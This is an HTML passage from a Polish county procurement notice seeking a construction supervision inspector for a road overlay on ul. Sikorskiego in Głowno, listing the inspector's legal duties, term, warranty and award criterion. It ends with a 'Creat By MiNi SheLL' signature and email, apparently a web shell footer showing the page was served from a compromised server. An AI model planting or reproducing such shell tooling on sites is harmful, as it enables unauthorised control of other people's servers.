b)uzgadnianie z Zamawiającym wszelkich odstępstw i zmian technologii robót, materiałów i urządzeń,  zgłaszanych przez wykonawcę robót, szczególnie w sytuacjach, gdy zmiany te mogą skutkować rozszerzeniem zakresu rzeczowego określonego umową lub podwyższeniem kosztów realizacji robót,
c)sprawdzanie jakości wykonanych robót budowlanych, wbudowanych materiałów, a  w szczególności zapobieganie zastosowaniu wyrobów
 i materiałów budowlanych wadliwych oraz nie dopuszczonych do obrotu i stosowania w budownictwie,
d)sprawdzanie i odbiór robót budowlanych ulegających zakryciu 
i zanikających, uczestniczenie w próbach rozruchu i odbiorach technicznych instalacji i urządzeń technicznych,
e)przygotowanie i stwierdzenie gotowości do odbioru robót oraz udział w czynnościach odbioru robót,
f)potwierdzanie ilości wykonanych robót,
g)potwierdzanie usunięcia wad stwierdzonych przy odbiorze,
h)sprawdzanie rozliczeń Wykonawcy robót budowlanych i potwierdzanie należnych mu kwot oraz rozliczenie końcowe inwestycji,
i)uczestniczenie w przeglądach gwarancyjnych okresu gwarancji,
j)inne niezbędne czynności konieczne dla prawidłowego sprawowania nadzoru inwestorskiego.
k)udział w naradach technicznych zwoływanych przez Zamawiającego lub Wykonawcę robót budowlanych.
l)Zamawiający wymaga, aby Wykonawca był przedsiębiorcą  w rozumieniu przepisów ustawy z dnia 2 lipca 2004r. o swobodzie działalności gospodarczej (t.j. Dz. U. z 2007r. Nr 155, poz. 1095 ze zm.).
m)Zamawiający zastrzega, że umowa na wykonanie przedmiotowego zamówienia zostanie zawarta dopiero po wyłonieniu wykonawcy na roboty budowlane.
n)Zleceniobiorca ponosi odpowiedzialność za szkody wyrządzone na skutek nie wykonania lub nienależytego wykonania czynności objętych umową, ocenianego w granicach przewidzianych dla umów starannego działania.
2.Termin realizacji inwestycji 14 dni od dnia przekazania terenu.
3.Okres gwarancji na wykonane prace 24 miesiące..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Pełnienie funkcji inspektora nadzoru nad zadaniem pn. Wykonanie nakładki na drodze powiatowej Nr 5101 E  - ul. Sikorskiego w Głownie.</p>
<ul class="kh_indent_1"><li><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Pełnienie funkcji inspektora nadzoru nad zadaniem pn. Wykonanie nakładki na drodze powiatowej Nr 5101 E  - ul. Sikorskiego w Głownie Wspólny Słownik Zamówień:  71521000-6
Charakterystyka nadzorowanej inwestycji:
Przedmiotem zamówienia są roboty budowlane obejmujące Wykonanie nakładki na drodze powiatowej Nr 5101 E - ul. Sikorskiego w Głownie do zadania Przebudowa chodnika w drodze powiatowej Nr 5101 E- ul. Sikorskiego w Głownie, a w szczególności: 
1)wykonywanie warstw konstrukcji (warstwa ścieralna gr. 5,00 cm) nawierzchni  z betonu asfaltowego, na powierzchni 4040,0 m2, 
2)wykonanie  i odbiór robót związanych z oczyszczeniem i skropieniem warstw konstrukcyjnych nawierzchni na powierzchni 4040,00 m2, 
3)wykonanie i odbiór robót związanych z wykonaniem regulacji pionowej studzienek dla urządzeń podziemnych w pasie drogowym,
4)wykonanie i odbiór robót związanych z odtworzeniem trasy drogowej i jej punktów wysokościowych przy liniowych robotach ziemnych.
Szczegółowe wymagania dotyczące realizacji przedmiotu zamówienia opisanego w pkt. 2.1. zawarte są w Ogólnych Specyfikacjach Technicznych stanowiących załącznik nr 9 do SIWZ i Szczegółowych Specyfikacjach Technicznych stanowiących załącznik nr 10 do SIWZ wymienionych poniżej:
Ogólnych Specyfikacjach Technicznych:
6)WYMAGANIA OGÓLNE
7)ROBOTY PRZYGOTOWAWCZE
8)REGULACJA   PIONOWA   USZKODZONEJ STUDZIENKI  KANALIZACYJNEJ
9)OCZYSZCZENIE  I  SKROPIENIE WARSTW  KONSTRUKCYJNYCH
10)NAWIERZCHNIA  Z  BETONU  ASFALTOWEGO
Szczegółowych Specyfikacjach technicznych:
6)NAWIERZCHNIA  Z  BETONU  ASFALTOWEGO
7)OCZYSZCZENIE  I  SKROPIENIE WARSTW  KONSTRUKCYJNYCH
8)REGULACJA   PIONOWA   USZKODZONEJ STUDZIENKI   KANALIZACYJNEJ
9)ODTWORZENIE  TRASY I  PUNKTÓW  WYSOKOŚCIOWYCH

Zamawiający zaleca, aby Wykonawcy dokonali wizji lokalnej na terenie objętym nadzorem oraz zapoznali się z dokumentacją techniczną oraz kosztorysową, dotyczącą inwestycji objętej usługą nadzoru. Przedmiotowa dokumentacja dostępna jest na stronie Zamawiającego: www.starostwo.zgierz.pl/przetargi Znak postępowania OR.343-94/09, lub w siedzibie Zamawiającego pok. 307,309
Wykonawca zobowiązany jest zapewnić techniczny, finansowy i organizacyjny nadzór inwestorski. Wykonawca, jako przedstawiciel Zamawiającego odpowiedzialny jest za kontrolę ilościową i jakościową wykonanych robót oraz za kontrolę pod względem zgodności wykonywania robót z warunkami technicznymi opisanymi w dokumentacji kosztorysowej, Ogólnych Specyfikacjach Technicznych i Szczegółowych Specyfikacjach Technicznych.
1.	Wykonawca zobowiązany jest do: 
1) udziału w czynnościach przekazania wykonawcy Inwestycji terenu inwestorskich;
2) Zakres podstawowych obowiązków i praw inspektora nadzoru wynika  z art. 25 i 26 ustawy z dnia 7 lipca 1994r. Prawo budowlane (tj. Dz.U. z 2006r., Nr  156, poz. 1118 z późn. zm.) i obejmuje w szczególności:
a)	reprezentowanie Zamawiającego na budowie przez sprawowanie kontroli zgodności realizacji robót z dokumentacją postępowania,
 obowiązującymi przepisami i normami oraz zasadami wiedzy technicznej,
b)	uzgadnianie z Zamawiającym wszelkich odstępstw i zmian technologii robót, materiałów i urządzeń,  zgłaszanych przez wykonawcę robót, szczególnie w sytuacjach, gdy zmiany te mogą skutkować rozszerzeniem zakresu rzeczowego określonego umową lub podwyższeniem kosztów realizacji robót,
c)	sprawdzanie jakości wykonanych robót budowlanych, wbudowanych materiałów, a  w szczególności zapobieganie zastosowaniu wyrobów
 i materiałów budowlanych wadliwych oraz nie dopuszczonych do obrotu i stosowania w budownictwie,
d)	sprawdzanie i odbiór robót budowlanych ulegających zakryciu 
i zanikających, uczestniczenie w próbach rozruchu i odbiorach technicznych instalacji i urządzeń technicznych,
e)	przygotowanie i stwierdzenie gotowości do odbioru robót oraz udział             w czynnościach odbioru robót,
f)	potwierdzanie ilości wykonanych robót,
g)	potwierdzanie usunięcia wad stwierdzonych przy odbiorze,
h)	sprawdzanie rozliczeń Wykonawcy robót budowlanych i potwierdzanie należnych mu kwot oraz rozliczenie końcowe inwestycji,
i)	uczestniczenie w przeglądach gwarancyjnych okresu gwarancji,
j)	inne niezbędne czynności konieczne dla prawidłowego sprawowania nadzoru inwestorskiego.
k)	udział w naradach technicznych zwoływanych przez Zamawiającego lub Wykonawcę robót budowlanych.
l)	Zamawiający wymaga, aby Wykonawca był przedsiębiorcą                            w rozumieniu przepisów ustawy z dnia 2 lipca 2004r. o swobodzie działalności gospodarczej (t.j. Dz. U. z 2007r. Nr 155, poz. 1095 ze zm.).
m)	Zamawiający zastrzega, że umowa na wykonanie przedmiotowego zamówienia zostanie zawarta dopiero po wyłonieniu wykonawcy na roboty budowlane.
n)	Zleceniobiorca ponosi odpowiedzialność za szkody wyrządzone na skutek nie wykonania lub nienależytego wykonania czynności objętych umową, ocenianego w granicach przewidzianych dla umów starannego działania.
2.	Termin realizacji inwestycji 14 dni od dnia przekazania terenu .
3.	Okres gwarancji na wykonane prace 24 miesiące..</li>
<li><b>2) Wspólny Słownik Zamówień (CPV):</b> 71.52.10.00-6.</li>
<li><b>3) Czas trwania lub termin wykonania:</b> Okres w dniach: 14.</li>
<li><b>4) Kryteria oceny ofert:</b>najniższa cena.</p></ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com